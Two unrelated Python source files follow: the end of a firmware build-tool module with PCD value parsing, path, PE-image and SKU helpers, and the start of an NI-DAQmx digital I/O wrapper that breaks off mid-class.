#    TokenSpace.PcdCName|PcdValue[|VOID*[|MaxSize]]
#    TokenSpace.PcdCName|PcdValue
# 4. Dynamic VPD:
#    TokenSpace.PcdCName|VpdOffset[|VpdValue]
#    TokenSpace.PcdCName|VpdOffset[|MaxSize[|VpdValue]]
# 5. Dynamic HII:
#    TokenSpace.PcdCName|HiiString|VariableGuid|VariableOffset[|HiiValue]
# PCD value needs to be located in such kind of string, and the PCD value might be an expression in which
#    there might have "|" operator, also in string value.
#
# @param Setting: String contain information described above with "TokenSpace.PcdCName|" stripped
# @param PcdType: PCD type: feature, fixed, dynamic default VPD HII
# @param DataType: The datum type of PCD: VOID*, UNIT, BOOL
# @retval:
#   ValueList: A List contain fields described above
#   IsValid:   True if conforming EBNF, otherwise False
#   Index:     The index where PcdValue is in ValueList
#
def AnalyzeDscPcd(Setting, PcdType, DataType=''):
    FieldList = AnalyzePcdExpression(Setting)
    IsValid = True
    if PcdType in (MODEL_PCD_FIXED_AT_BUILD, MODEL_PCD_PATCHABLE_IN_MODULE, MODEL_PCD_DYNAMIC_DEFAULT, MODEL_PCD_DYNAMIC_EX_DEFAULT):
        # Value[|DatumType[|MaxSize]]
        Value = FieldList[0]
        Size = ''
        if len(FieldList) > 1 and FieldList[1]:
            DataType = FieldList[1]
            # Only VOID* or a struct-like type name is acceptable here.
            if FieldList[1] != TAB_VOID and StructPattern.match(FieldList[1]) is None:
                IsValid = False
        if len(FieldList) > 2:
            Size = FieldList[2]
        if IsValid:
            if DataType == "":
                IsValid = (len(FieldList) <= 1)
            else:
                IsValid = (len(FieldList) <= 3)
        if Size:
            # MaxSize must be a decimal or 0x-prefixed hex integer.
            try:
                int(Size, 16) if Size.upper().startswith("0X") else int(Size)
            except:
                IsValid = False
                Size = -1
        return [str(Value), DataType, str(Size)], IsValid, 0
    elif PcdType == MODEL_PCD_FEATURE_FLAG:
        # A feature flag carries a single value field only.
        Value = FieldList[0]
        Size = ''
        IsValid = (len(FieldList) <= 1)
        return [Value, DataType, str(Size)], IsValid, 0
    elif PcdType in (MODEL_PCD_DYNAMIC_VPD, MODEL_PCD_DYNAMIC_EX_VPD):
        # VpdOffset[|Value] for scalar types, VpdOffset[|MaxSize[|Value]] for VOID*.
        VpdOffset = FieldList[0]
        Value = Size = ''
        if not DataType == TAB_VOID:
            if len(FieldList) > 1:
                Value = FieldList[1]
        else:
            if len(FieldList) > 1:
                Size = FieldList[1]
            if len(FieldList) > 2:
                Value = FieldList[2]
        if DataType == "":
            IsValid = (len(FieldList) <= 1)
        else:
            IsValid = (len(FieldList) <= 3)
        if Size:
            try:
                int(Size, 16) if Size.upper().startswith("0X") else int(Size)
            except:
                IsValid = False
                Size = -1
        return [VpdOffset, str(Size), Value], IsValid, 2
    elif PcdType in (MODEL_PCD_DYNAMIC_HII, MODEL_PCD_DYNAMIC_EX_HII):
        # HiiString|VariableGuid|VariableOffset[|Value[|Attribute]]
        IsValid = (3 <= len(FieldList) <= 5)
        HiiString = FieldList[0]
        Guid = Offset = Value = Attribute = ''
        if len(FieldList) > 1:
            Guid = FieldList[1]
        if len(FieldList) > 2:
            Offset = FieldList[2]
        if len(FieldList) > 3:
            Value = FieldList[3]
            if not Value:
                IsValid = False
        if len(FieldList) > 4:
            Attribute = FieldList[4]
        return [HiiString, Guid, Offset, Value, Attribute], IsValid, 3
    return [], False, 0
## AnalyzePcdData
#
#  Analyze the pcd Value, Datum type and TokenNumber.
#  Used to avoid split issue while the value string contain "|" character
#
#  @param[in] Setting:  A String contain value/datum type/token number information;
#
#  @retval   ValueList: A List contain value, datum type and toke number.
#
def AnalyzePcdData(Setting):
    # A quoted string value may itself contain '|'; pull it out before
    # splitting and put it back as the first field afterwards.
    PtrPattern = re.compile(r'^\s*L?\".*\|.*\"')
    Quoted = PtrPattern.findall(Setting)
    if Quoted:
        Setting = re.sub(PtrPattern, '', Setting)
    Fields = ['', '', '']
    Tokens = Setting.split(TAB_VALUE_SPLIT)
    Fields[0:len(Tokens)] = Tokens
    if Quoted:
        Fields[0] = Quoted[0]
    return Fields
## check format of PCD value against its the datum type
#
# For PCD value setting
#
def CheckPcdDatum(Type, Value):
    """Validate PCD value string Value against datum Type.

    Returns (True, '') or (True, 'StructurePcd') on success, and
    (False, <reason>) on failure.
    """
    if Type == TAB_VOID:
        ValueRe = re.compile(r'\s*L?\".*\"\s*$')
        # BUGFIX: the original char-literal test read
        #   Value.startswith("L'") or Value.startswith("'") and Value.endswith("'")
        # which, by operator precedence, accepted any value starting with L'
        # even without a closing quote.
        if not (((Value.startswith('L"') or Value.startswith('"')) and Value.endswith('"'))
                or (Value.startswith('{') and Value.endswith('}'))
                or ((Value.startswith("L'") or Value.startswith("'")) and Value.endswith("'"))
               ):
            return False, "Invalid value [%s] of type [%s]; must be in the form of {...} for array"\
                          ", \"...\" or \'...\' for string, L\"...\" or L\'...\' for unicode string" % (Value, Type)
        elif ValueRe.match(Value):
            # Check the chars in UnicodeString or CString is printable
            if Value.startswith("L"):
                Value = Value[2:-1]
            else:
                Value = Value[1:-1]
            Printset = set(string.printable)
            Printset.remove(TAB_PRINTCHAR_VT)
            Printset.add(TAB_PRINTCHAR_BS)
            Printset.add(TAB_PRINTCHAR_NUL)
            if not set(Value).issubset(Printset):
                PrintList = sorted(Printset)
                return False, "Invalid PCD string value of type [%s]; must be printable chars %s." % (Type, PrintList)
    elif Type == 'BOOLEAN':
        if Value not in ['TRUE', 'True', 'true', '0x1', '0x01', '1', 'FALSE', 'False', 'false', '0x0', '0x00', '0']:
            return False, "Invalid value [%s] of type [%s]; must be one of TRUE, True, true, 0x1, 0x01, 1"\
                          ", FALSE, False, false, 0x0, 0x00, 0" % (Value, Type)
    elif Type in [TAB_UINT8, TAB_UINT16, TAB_UINT32, TAB_UINT64]:
        try:
            # BUGFIX: the negative-value check used to run *outside* the try
            # block, so a non-numeric Value crashed with ValueError instead
            # of returning an error tuple.
            if Value and int(Value, 0) < 0:
                return False, "PCD can't be set to negative value[%s] for datum type [%s]" % (Value, Type)
            Value = long(Value, 0)
            if Value > MAX_VAL_TYPE[Type]:
                return False, "Too large PCD value[%s] for datum type [%s]" % (Value, Type)
        except:
            return False, "Invalid value [%s] of type [%s];"\
                          " must be a hexadecimal, decimal or octal in C language format." % (Value, Type)
    else:
        return True, "StructurePcd"
    return True, ""
## Split command line option string to list
#
# subprocess.Popen needs the args to be a sequence. Otherwise there's problem
# in non-windows platform to launch command
#
def SplitOption(OptionString):
    # Options start with '/' or '-' that follows whitespace; separators
    # between options are dropped, and quoted regions are kept intact.
    Options = []
    Prev = " "
    Start = 0
    Quote = ""
    for Pos, Ch in enumerate(OptionString):
        if Ch in ('"', "'"):
            if Quote == Ch:
                Quote = ""
            elif not Quote:
                Quote = Ch
            continue
        if Quote:
            continue
        if Ch in ("/", "-") and Prev in (" ", "\t", "\r", "\n"):
            if Pos > Start:
                Options.append(OptionString[Start:Pos - 1])
            Start = Pos
        Prev = Ch
    Options.append(OptionString[Start:])
    return Options
def CommonPath(PathList):
    """Return the longest common leading sub-path of the paths in PathList.

    Only the lexicographic minimum and maximum need to be compared: any
    path component shared by those two extremes is shared by every path
    in between.
    """
    P1 = min(PathList).split(os.path.sep)
    P2 = max(PathList).split(os.path.sep)
    # Portability fix: range() instead of the Python-2-only xrange(); the
    # component lists are tiny so behavior and cost are identical.
    for Index in range(min(len(P1), len(P2))):
        if P1[Index] != P2[Index]:
            return os.path.sep.join(P1[:Index])
    return os.path.sep.join(P1)
#
# Convert string to C format array
#
def ConvertStringToByteArray(Value):
    # Normalize a {..} byte list, or expand a (unicode) string literal into
    # a NUL-terminated C array initializer.  Returns None for bad input.
    Value = Value.strip()
    if not Value:
        return None
    if Value[0] == '{':
        if not Value.endswith('}'):
            return None
        Body = Value.replace(' ', '').replace('{', '').replace('}', '')
        try:
            Fields = [str(int(Field, 0)) for Field in Body.split(',')]
        except ValueError:
            return None
        return '{' + ','.join(Fields) + '}'
    IsUnicode = Value.startswith('L"')
    if IsUnicode:
        if not Value.endswith('"'):
            return None
        Value = Value[1:]
    elif not (Value.startswith('"') and Value.endswith('"')):
        return None
    Value = eval(Value)  # translate escape character
    # 16-bit elements for a unicode string, 8-bit for ASCII.
    Mask = 0x10000 if IsUnicode else 0x100
    return '{' + ''.join(str(ord(Ch) % Mask) + ',' for Ch in Value) + '0}'
class PathClass(object):
    """A file path plus its workspace/package context and build metadata.

    Splits File into Root (workspace-relative base) and the remaining
    relative path, and derives Dir/Name/BaseName/Ext from it.
    """
    def __init__(self, File='', Root='', AlterRoot='', Type='', IsBinary=False,
                 Arch='COMMON', ToolChainFamily='', Target='', TagName='', ToolCode=''):
        self.Arch = Arch
        self.File = str(File)
        # An absolute File overrides any supplied roots.
        if os.path.isabs(self.File):
            self.Root = ''
            self.AlterRoot = ''
        else:
            self.Root = str(Root)
            self.AlterRoot = str(AlterRoot)
        # Remove any '.' and '..' in path
        if self.Root:
            self.Root = mws.getWs(self.Root, self.File)
            self.Path = os.path.normpath(os.path.join(self.Root, self.File))
            self.Root = os.path.normpath(CommonPath([self.Root, self.Path]))
            # eliminate the side-effect of 'C:'
            if self.Root[-1] == ':':
                self.Root += os.path.sep
            # file path should not start with path separator
            if self.Root[-1] == os.path.sep:
                self.File = self.Path[len(self.Root):]
            else:
                self.File = self.Path[len(self.Root) + 1:]
        else:
            self.Path = os.path.normpath(self.File)
        self.SubDir, self.Name = os.path.split(self.File)
        self.BaseName, self.Ext = os.path.splitext(self.Name)
        if self.Root:
            if self.SubDir:
                self.Dir = os.path.join(self.Root, self.SubDir)
            else:
                self.Dir = self.Root
        else:
            self.Dir = self.SubDir
        # For binaries the caller supplies Type; otherwise it is the
        # lowercase file extension.
        if IsBinary:
            self.Type = Type
        else:
            self.Type = self.Ext.lower()
        self.IsBinary = IsBinary
        self.Target = Target
        self.TagName = TagName
        self.ToolCode = ToolCode
        self.ToolChainFamily = ToolChainFamily
    ## Convert the object of this class to a string
    #
    #  Convert member Path of the class to a string
    #
    #  @retval string Formatted String
    #
    def __str__(self):
        return self.Path
    ## Override __eq__ function
    #
    # Check whether PathClass are the same
    #
    # @retval False The two PathClass are different
    # @retval True  The two PathClass are the same
    #
    def __eq__(self, Other):
        if isinstance(Other, type(self)):
            return self.Path == Other.Path
        else:
            return self.Path == str(Other)
    ## Override __cmp__ function
    #
    # Customize the comparsion operation of two PathClass
    #
    # @retval 0     The two PathClass are different
    # @retval -1    The first PathClass is less than the second PathClass
    # @retval 1     The first PathClass is Bigger than the second PathClass
    def __cmp__(self, Other):
        if isinstance(Other, type(self)):
            OtherKey = Other.Path
        else:
            OtherKey = str(Other)
        SelfKey = self.Path
        if SelfKey == OtherKey:
            return 0
        elif SelfKey > OtherKey:
            return 1
        else:
            return -1
    ## Override __hash__ function
    #
    # Use Path as key in hash table
    #
    # @retval string Key for hash table
    #
    def __hash__(self):
        return hash(self.Path)
    @cached_property
    def Key(self):
        # Case-insensitive identity used as a dictionary key.
        return self.Path.upper()
    @property
    def TimeStamp(self):
        # st_mtime of the file (index 8 of os.stat's tuple).
        return os.stat(self.Path)[8]
    def Validate(self, Type='', CaseSensitive=True):
        # Check that the file exists (possibly under AlterRoot) with the
        # expected type and, optionally, exact on-disk case; on success the
        # object is updated to the real on-disk path.
        # Returns (ErrorCode, ErrorInfo); ErrorCode 0 means success.
        if GlobalData.gCaseInsensitive:
            CaseSensitive = False
        if Type and Type.lower() != self.Type:
            return FILE_TYPE_MISMATCH, '%s (expect %s but got %s)' % (self.File, Type, self.Type)
        RealFile, RealRoot = RealPath2(self.File, self.Root, self.AlterRoot)
        if not RealRoot and not RealFile:
            RealFile = self.File
            if self.AlterRoot:
                RealFile = os.path.join(self.AlterRoot, self.File)
            elif self.Root:
                RealFile = os.path.join(self.Root, self.File)
            if len (mws.getPkgPath()) == 0:
                return FILE_NOT_FOUND, os.path.join(self.AlterRoot, RealFile)
            else:
                return FILE_NOT_FOUND, "%s is not found in packages path:\n\t%s" % (self.File, '\n\t'.join(mws.getPkgPath()))
        ErrorCode = 0
        ErrorInfo = ''
        if RealRoot != self.Root or RealFile != self.File:
            if CaseSensitive and (RealFile != self.File or (RealRoot != self.Root and RealRoot != self.AlterRoot)):
                ErrorCode = FILE_CASE_MISMATCH
                ErrorInfo = self.File + '\n\t' + RealFile + " [in file system]"
            self.SubDir, self.Name = os.path.split(RealFile)
            self.BaseName, self.Ext = os.path.splitext(self.Name)
            if self.SubDir:
                self.Dir = os.path.join(RealRoot, self.SubDir)
            else:
                self.Dir = RealRoot
            self.File = RealFile
            self.Root = RealRoot
            self.Path = os.path.join(RealRoot, RealFile)
        return ErrorCode, ErrorInfo
## Parse PE image to get the required PE information.
#
class PeImageClass():
    ## Constructor
    #
    #  @param  File FilePath of PeImage
    #
    def __init__(self, PeFile):
        self.FileName = PeFile
        self.IsValid = False           # True only after a complete, successful parse
        self.Size = 0                  # SizeOfImage field of the optional header
        self.EntryPoint = 0            # AddressOfEntryPoint (RVA)
        self.SectionAlignment = 0
        self.SectionHeaderList = []    # (Name, VirtualAddress, RawAddress, VirtualSize)
        self.ErrorInfo = ''
        try:
            PeObject = open(PeFile, 'rb')
        except:
            self.ErrorInfo = self.FileName + ' can not be found\n'
            return
        # Read DOS header
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 0x3E)
        ByteList = ByteArray.tolist()
        # DOS signature should be 'MZ'
        if self._ByteListToStr (ByteList[0x0:0x2]) != 'MZ':
            self.ErrorInfo = self.FileName + ' has no valid DOS signature MZ'
            return
        # Read 4 byte PE Signature
        # NOTE(review): only 2 of the 4 bytes of e_lfanew (offset 0x3C) are
        # read here; fine while the PE header offset fits in 16 bits --
        # confirm for large images.
        PeOffset = self._ByteListToInt(ByteList[0x3C:0x3E])
        PeObject.seek(PeOffset)
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 4)
        # PE signature should be 'PE\0\0'
        # NOTE(review): array.tostring() is Python-2 era API (removed in 3.9).
        if ByteArray.tostring() != 'PE\0\0':
            self.ErrorInfo = self.FileName + ' has no valid PE signature PE00'
            return
        # Read PE file header
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, 0x14)
        ByteList = ByteArray.tolist()
        SecNumber = self._ByteListToInt(ByteList[0x2:0x4])
        if SecNumber == 0:
            self.ErrorInfo = self.FileName + ' has no section header'
            return
        # Read PE optional header
        OptionalHeaderSize = self._ByteListToInt(ByteArray[0x10:0x12])
        ByteArray = array.array('B')
        ByteArray.fromfile(PeObject, OptionalHeaderSize)
        ByteList = ByteArray.tolist()
        self.EntryPoint = self._ByteListToInt(ByteList[0x10:0x14])
        self.SectionAlignment = self._ByteListToInt(ByteList[0x20:0x24])
        self.Size = self._ByteListToInt(ByteList[0x38:0x3C])
        # Read each Section Header
        for Index in range(SecNumber):
            ByteArray = array.array('B')
            ByteArray.fromfile(PeObject, 0x28)
            ByteList = ByteArray.tolist()
            SecName = self._ByteListToStr(ByteList[0:8])
            SecVirtualSize = self._ByteListToInt(ByteList[8:12])
            SecRawAddress = self._ByteListToInt(ByteList[20:24])
            SecVirtualAddress = self._ByteListToInt(ByteList[12:16])
            self.SectionHeaderList.append((SecName, SecVirtualAddress, SecRawAddress, SecVirtualSize))
        self.IsValid = True
        PeObject.close()
    def _ByteListToStr(self, ByteList):
        # Decode a NUL-terminated byte list into a string.
        String = ''
        for index in range(len(ByteList)):
            if ByteList[index] == 0:
                break
            String += chr(ByteList[index])
        return String
    def _ByteListToInt(self, ByteList):
        # Interpret a byte list as a little-endian unsigned integer.
        Value = 0
        for index in range(len(ByteList) - 1, -1, -1):
            Value = (Value << 8) | int(ByteList[index])
        return Value
class DefaultStore():
    """Helper over the platform's [DefaultStores] section content."""
    def __init__(self, DefaultStores ):
        # NOTE(review): DefaultStoreID compares each *value* directly with a
        # store name, while GetMin unpacks each value as a (storeid,
        # storename) pair -- the two methods assume different value shapes;
        # confirm the actual mapping layout against the callers.
        self.DefaultStores = DefaultStores
    def DefaultStoreID(self, DefaultStoreName):
        # Reverse lookup: store name -> key; None when the name is unknown.
        for key, value in self.DefaultStores.items():
            if value == DefaultStoreName:
                return key
        return None
    def GetDefaultDefault(self):
        # Return (id, name) of the store with the numerically smallest id;
        # fall back to the well-known default store when "0" is present or
        # no stores are defined.
        if not self.DefaultStores or "0" in self.DefaultStores:
            return "0", TAB_DEFAULT_STORES_DEFAULT
        else:
            minvalue = min(int(value_str) for value_str in self.DefaultStores)
            return (str(minvalue), self.DefaultStores[str(minvalue)])
    def GetMin(self, DefaultSIdList):
        # Among the stores named in DefaultSIdList, return the name of the
        # one with the smallest id; '' when none match, and the well-known
        # default when the input list is empty.
        if not DefaultSIdList:
            return TAB_DEFAULT_STORES_DEFAULT
        storeidset = {storeid for storeid, storename in self.DefaultStores.values() if storename in DefaultSIdList}
        if not storeidset:
            return ""
        minid = min(storeidset )
        for sid, name in self.DefaultStores.values():
            if sid == minid:
                return name
class SkuClass():
    """Holds the set of SKUs selected for a build and their inheritance.

    SkuIds maps SkuName -> (SkuIdValue, SkuName, ParentSkuName?); the
    SkuIdentifier is the user's selection: '', 'ALL' or 'A|B|...'.
    """
    DEFAULT = 0       # only the DEFAULT SKU is built
    SINGLE = 1        # exactly one non-default SKU
    MULTIPLE =2       # several SKUs
    def __init__(self,SkuIdentifier='', SkuIds=None):
        if SkuIds is None:
            SkuIds = {}
        # A SKU id must fit in a UINT64.
        for SkuName in SkuIds:
            SkuId = SkuIds[SkuName][0]
            skuid_num = int(SkuId, 16) if SkuId.upper().startswith("0X") else int(SkuId)
            if skuid_num > 0xFFFFFFFFFFFFFFFF:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData = "SKU-ID [%s] value %s exceeds the max value of UINT64"
                                      % (SkuName, SkuId))
        self.AvailableSkuIds = sdict()
        self.SkuIdSet = []
        self.SkuIdNumberSet = []
        self.SkuData = SkuIds
        self._SkuInherit = {}
        self._SkuIdentifier = SkuIdentifier
        if SkuIdentifier == '' or SkuIdentifier is None:
            self.SkuIdSet = ['DEFAULT']
            self.SkuIdNumberSet = ['0U']
        elif SkuIdentifier == 'ALL':
            # NOTE(review): keys() is used as a (mutable) list here -- this
            # module targets Python 2, where that holds.
            self.SkuIdSet = SkuIds.keys()
            self.SkuIdNumberSet = [num[0].strip() + 'U' for num in SkuIds.values()]
        else:
            r = SkuIdentifier.split('|')
            self.SkuIdSet=[(r[k].strip()).upper() for k in range(len(r))]
            k = None
            try:
                self.SkuIdNumberSet = [SkuIds[k][0].strip() + 'U' for k in self.SkuIdSet]
            except Exception:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData = "SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
                                      % (k, " | ".join(SkuIds.keys())))
        for each in self.SkuIdSet:
            if each in SkuIds:
                self.AvailableSkuIds[each] = SkuIds[each][0]
            else:
                EdkLogger.error("build", PARAMETER_INVALID,
                            ExtraData="SKU-ID [%s] is not supported by the platform. [Valid SKU-ID: %s]"
                                      % (each, " | ".join(SkuIds.keys())))
        if self.SkuUsageType != SkuClass.SINGLE:
            self.AvailableSkuIds.update({'DEFAULT':0, 'COMMON':0})
        # Publish the concrete SKU names globally (without the wildcard).
        if self.SkuIdSet:
            GlobalData.gSkuids = (self.SkuIdSet)
            if 'COMMON' in GlobalData.gSkuids:
                GlobalData.gSkuids.remove('COMMON')
            if self.SkuUsageType == self.SINGLE:
                if len(GlobalData.gSkuids) != 1:
                    if 'DEFAULT' in GlobalData.gSkuids:
                        GlobalData.gSkuids.remove('DEFAULT')
            if GlobalData.gSkuids:
                GlobalData.gSkuids.sort()
    def GetNextSkuId(self, skuname):
        # Return the parent SKU of skuname per the inheritance column of
        # SkuData; DEFAULT terminates every chain.
        if not self._SkuInherit:
            self._SkuInherit = {}
            for item in self.SkuData.values():
                self._SkuInherit[item[1]]=item[2] if item[2] else "DEFAULT"
        return self._SkuInherit.get(skuname, "DEFAULT")
    def GetSkuChain(self, sku):
        # Inheritance chain from DEFAULT (first) down to sku (last).
        if sku == "DEFAULT":
            return ["DEFAULT"]
        skulist = [sku]
        nextsku = sku
        while True:
            nextsku = self.GetNextSkuId(nextsku)
            skulist.append(nextsku)
            if nextsku == "DEFAULT":
                break
        skulist.reverse()
        return skulist
    def SkuOverrideOrder(self):
        # Interleave all inheritance chains breadth-first so that a SKU is
        # always applied after every SKU it overrides.
        skuorderset = []
        for skuname in self.SkuIdSet:
            skuorderset.append(self.GetSkuChain(skuname))
        skuorder = []
        for index in range(max(len(item) for item in skuorderset)):
            for subset in skuorderset:
                if index > len(subset)-1:
                    continue
                if subset[index] in skuorder:
                    continue
                skuorder.append(subset[index])
        return skuorder
    @property
    def SkuUsageType(self):
        # Classify the selection as DEFAULT / SINGLE / MULTIPLE.
        if self._SkuIdentifier.upper() == "ALL":
            return SkuClass.MULTIPLE
        if len(self.SkuIdSet) == 1:
            if self.SkuIdSet[0] == 'DEFAULT':
                return SkuClass.DEFAULT
            return SkuClass.SINGLE
        if len(self.SkuIdSet) == 2 and 'DEFAULT' in self.SkuIdSet:
            return SkuClass.SINGLE
        return SkuClass.MULTIPLE
    def DumpSkuIdArrary(self):
        # Render the selected SKU ids (each followed by its inheritance
        # chain) as a C array initializer terminated by 0x0.
        if self.SkuUsageType == SkuClass.SINGLE:
            return "{0x0}"
        ArrayStrList = []
        for skuname in self.AvailableSkuIds:
            if skuname == "COMMON":
                continue
            while skuname != "DEFAULT":
                ArrayStrList.append(hex(int(self.AvailableSkuIds[skuname])))
                skuname = self.GetNextSkuId(skuname)
            ArrayStrList.append("0x0")
        return "{{{myList}}}".format(myList=",".join(ArrayStrList))
    @property
    def AvailableSkuIdSet(self):
        return self.AvailableSkuIds
    @property
    def SystemSkuId(self):
        # The single concrete SKU being built, or DEFAULT otherwise.
        if self.SkuUsageType == SkuClass.SINGLE:
            if len(self.SkuIdSet) == 1:
                return self.SkuIdSet[0]
            else:
                return self.SkuIdSet[0] if self.SkuIdSet[0] != 'DEFAULT' else self.SkuIdSet[1]
        else:
            return 'DEFAULT'
#
# Pack a registry format GUID
#
def PackRegistryFormatGuid(Guid):
    # A registry-format GUID is five hex groups joined by '-'.
    Groups = Guid.split('-')
    return PackGUID(Groups)
## Get the integer value from string like "14U" or integer like 2
#
# @param      Input   The object that may be either a integer value or a string
#
# @retval     Value    The integer value that the input represents
#
def GetIntegerValue(Input):
    # Integers pass straight through; strings may carry C-style suffixes.
    if type(Input) in (int, long):
        return Input
    Text = Input
    # Strip the C suffixes in the same order the original checks ran.
    for Suffix in ("U", "ULL", "LL"):
        if Text.endswith(Suffix):
            Text = Text[:-len(Suffix)]
    if Text.startswith(("0x", "0X")):
        return int(Text, 16)
    if Text == '':
        return 0
    return int(Text)
#
# Pack a GUID (registry format) list into a buffer and return it
#
def PackGUID(Guid):
    # Convert the five dash-separated hex groups of a registry-format GUID
    # into its 16-byte mixed-endian binary representation.
    Data1, Data2, Data3 = (int(Part, 16) for Part in Guid[:3])
    # 'Pos + 2 or None' turns the end index 0 into None so the final
    # negative slice reaches the end of the string.
    Data4 = [int(Guid[3][Pos:Pos + 2 or None], 16) for Pos in (-4, -2)]
    Node = [int(Guid[4][Pos:Pos + 2 or None], 16) for Pos in (-12, -10, -8, -6, -4, -2)]
    return pack(PACK_PATTERN_GUID, Data1, Data2, Data3, *(Data4 + Node))
#
# Pack a GUID (byte) list into a buffer and return it
#
def PackByteFormatGUID(Guid):
    # The first 11 scalar fields (Data1..Data3 plus the 8 node bytes) are
    # packed; any trailing elements of Guid are ignored, as before.
    return pack(PACK_PATTERN_GUID, *Guid[:11])
##
#
# This acts like the main() function for the script, unless it is 'import'ed into another
# script.
#
if __name__ == '__main__':
    # No standalone behavior: this module only provides helpers for importers.
    pass
|
daqmx.py
|
r"""
NI IO Trace can be used to troubleshoot & debug the setup. It should be installed
when the NI-DAQmx driver is installed.
PyDAQmx parses the NIDAQmx.h header to build ctypes wrappers for all function,
constants, etc. It also wraps the functions which return errors codes to raise
exceptions (and warnings) based on the return value.
https://www.ni.com/en-au/support/downloads/drivers/download.ni-daqmx.html#409845
API Reference manual:
https://zone.ni.com/reference/en-XX/help/370471AM-01/
C:\Program Files (x86)\National Instruments\NI-DAQ\DAQmx ANSI C Dev\include\NIDAQmx.h
C:\Program Files\National Instruments\NI-DAQ\DAQmx ANSI C Dev\include\NIDAQmx.h
"""
from collections import namedtuple
from fixate.core.common import ExcThread
from queue import Queue, Empty
from ctypes import byref, c_char_p
import numpy
# Basic Functions
from PyDAQmx import (
DAQmxResetDevice,
TaskHandle,
int32,
uInt8,
float64,
uInt64,
uInt32,
)
# Tasks
from PyDAQmx import (
DAQmxCreateTask,
DAQmxStartTask,
DAQmxWaitUntilTaskDone,
DAQmxStopTask,
DAQmxClearTask,
)
# Channels
from PyDAQmx import (
DAQmxCreateDOChan,
DAQmxCreateDIChan,
DAQmxReadDigitalLines,
DAQmxWriteDigitalLines,
DAQmx_Val_GroupByScanNumber,
DAQmx_Val_ChanPerLine,
DAQmxReadCounterScalarF64,
DAQmx_Val_Rising,
DAQmx_Val_Seconds,
DAQmxCfgSampClkTiming,
DAQmx_Val_FiniteSamps,
)
# Two Edge Separation
from PyDAQmx import (
DAQmxCreateCITwoEdgeSepChan,
DAQmxSetCITwoEdgeSepFirstTerm,
DAQmxGetCITwoEdgeSepFirstTerm,
DAQmxSetCITwoEdgeSepSecondTerm,
DAQmxGetCITwoEdgeSepSecondTerm,
DAQmx_Val_Falling,
)
# Signal Routing
from PyDAQmx import (
DAQmxConnectTerms,
DAQmxDisconnectTerms,
DAQmxTristateOutputTerm,
DAQmx_Val_InvertPolarity,
DAQmx_Val_DoNotInvertPolarity,
)
from fixate.core.exceptions import InstrumentError, ParameterError
# (port, range_start, range_end): a contiguous run of digital lines on one port.
IORange = namedtuple("IORange", ["port", "range_start", "range_end"])
IORange.__new__.__defaults__ = (0, None, None)
# (port, line): a single digital line on one port.
IOLine = namedtuple("IOLine", ["port", "line"])
IOLine.__new__.__defaults__ = (0, None)
class DaqTask:
    """Base wrapper for a single NI-DAQmx task.

    Tracks the task lifecycle in ``task_state`` ("" -> "init" ->
    "running" -> "stopped" -> ...).  Subclasses override ``init`` to
    create their channel, and whichever of ``read``/``write``/``trigger``
    they support; the unsupported operations raise NotImplementedError.
    """

    task_state = ""
    task = None

    def read(self):
        """Input is not supported unless a subclass overrides this."""
        raise NotImplementedError("Read not available for this Task")

    def write(self, data):
        """Output is not supported unless a subclass overrides this."""
        raise NotImplementedError("Write not available for this Task")

    def trigger(self):
        """Triggered measurement is not supported unless overridden."""
        raise NotImplementedError("Trigger not available for this Task")

    def init(self):
        """
        This method should be overridden to create the task
        :return:
        """

    def stop(self):
        # Stopping is meaningful only for a running task.
        if self.task_state != "running":
            return
        DAQmxStopTask(self.task)
        self.task_state = "stopped"

    def clear(self):
        self.stop()
        if self.task_state == "":
            # Never created (or already cleared): nothing to release.
            return
        DAQmxClearTask(self.task)
        self.task = None
        self.task_state = ""

    def start(self):
        if self.task_state == "running":
            return
        if not self.task_state:
            # First use: let the subclass create its channel.
            self.init()
        DAQmxStartTask(self.task)
        self.task_state = "running"
class DigitalOut(DaqTask):
    """Immediate (software-timed) digital output, one DAQmx channel per line."""

    def __init__(self, task_string, io_length):
        # io_length: number of physical lines covered by task_string; every
        # write must supply a multiple of this many values.
        self.io_length = io_length
        self.task_string = task_string

    def init(self):
        # Lazily create the task on first use, then (re)start it if needed.
        if self.task_state == "":
            self.task = TaskHandle()
            DAQmxCreateTask(b"", byref(self.task))
            DAQmxCreateDOChan(self.task, self.task_string, b"", DAQmx_Val_ChanPerLine)
            self.task_state = "init"
        if self.task_state in ["init", "stopped"]:
            self.start()

    def read(self):
        # Read back the current state of the output lines: one uInt8 per line.
        self.init()
        data_arr = numpy.zeros(self.io_length, uInt8)
        samples_per_chan = int32()
        num_bytes_per_sample = int32()
        DAQmxReadDigitalLines(
            self.task,
            1,  # Samples per channel
            2.0,  # Timeout
            DAQmx_Val_GroupByScanNumber,  # Interleaved
            data_arr,
            len(data_arr),
            byref(samples_per_chan),
            byref(num_bytes_per_sample),
            None,
        )
        return data_arr

    def write(self, data):
        """
        Data must be an iterable like a list of 1s and 0s
        Data is grouped by scan number. Each element in the array will write to each line in the digital output until
        exhausted and then will start from the beginning for the next sample. Sample rate is as set in creating the IO
        task.
        """
        self.init()
        try:
            if len(data) % self.io_length:
                raise ValueError(
                    "data must be a length divisible by {}".format(self.io_length)
                )
            data_arr = numpy.zeros(len(data), uInt8)
            data_arr[:] = data
        except TypeError:
            # data has no len(): treat it as one scalar sample, which is only
            # valid when this task drives a single line.
            if self.io_length != 1:
                raise ValueError(
                    "data must be a list of length divisible by {}".format(
                        self.io_length
                    )
                )
            data_arr = numpy.zeros(1, uInt8)
            data_arr[:] = [data]
        written = int32()
        # NOTE(review): `written` is passed directly rather than via byref();
        # presumably PyDAQmx auto-wraps output args — confirm against PyDAQmx docs.
        DAQmxWriteDigitalLines(
            self.task,
            len(data_arr) // self.io_length,  # Samples per channel
            1,  # Autostart task
            2.0,  # Timeout
            DAQmx_Val_GroupByScanNumber,  # Interleaved
            data_arr,
            written,
            None,
        )
class DigitalIn(DaqTask):
    """Immediate (software-timed) digital input, one DAQmx channel per line."""

    def __init__(self, task_string, io_length):
        # io_length: number of physical lines covered by task_string; read()
        # returns this many values.
        self.io_length = io_length
        self.task_string = task_string

    def init(self):
        # Lazily create the task on first use, then (re)start it if needed.
        if self.task_state == "":
            self.task = TaskHandle()
            DAQmxCreateTask(b"", byref(self.task))
